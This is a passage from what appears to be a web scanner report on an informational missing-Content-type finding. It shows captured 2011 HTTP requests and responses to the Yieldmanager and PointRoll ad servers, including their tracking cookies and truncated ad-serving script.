
In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


26.1. http://ad.yieldmanager.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?_PVID=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7&ad_type=iframe&ad_size=300x250&site=224114&section_code=14486084&cb=1315312187399365&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15sa69po3/M=787833.14486084.14323910.12559432/D=allmyfr/S=360632246:LREC/Y=YAHOO/EXP=1315319387/L=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7/B=ejW9Ptj8el8-/J=1315312187399365/K=nql_VTEk0rLg6_ewKQ00GQ/A=6284639/R=0/* HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!(!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE"; bh="b!!!#C!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G
@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:48 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:29:48 GMT
Pragma: no-cache
Content-Length: 5897
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...

26.2. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1394840Y52120110823224152&time=2|12:45|-5&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&r=0.34970951941795647 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1394840' src='http://ads.pointroll.com/PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0
...[SNIP]...
